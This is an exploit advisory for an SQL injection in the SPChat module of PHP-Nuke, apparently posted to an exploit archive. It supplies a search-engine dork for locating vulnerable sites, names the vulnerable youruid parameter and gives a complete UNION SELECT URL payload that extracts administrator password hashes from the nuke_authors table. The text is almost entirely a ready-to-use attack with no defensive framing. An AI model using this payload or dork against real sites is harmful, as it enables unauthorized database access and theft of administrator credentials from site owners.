## Owner : Pr0T3cT10n## Script site : http://www.phpnuke.org## Script name : PHP-Nuke module(SPChat)## Version : All## Type : SQL Injection## D0rk : inurl:name=SPChat## Description :## Pull out user details from the database## Vuln :## http://www.example.com/modules.php?op=modload&name=SPChat&file=chooser&youruid=[SQL Injection]## http://www.example.com/modules.php?op=modload&name=SPChat&file=chooser&youruid=0+UNION+SELECT+pwd,2,3,4,5,6,7,8+FROM+nuke_authors+LIMIT+0,1## NOTE :## You need to be a regular user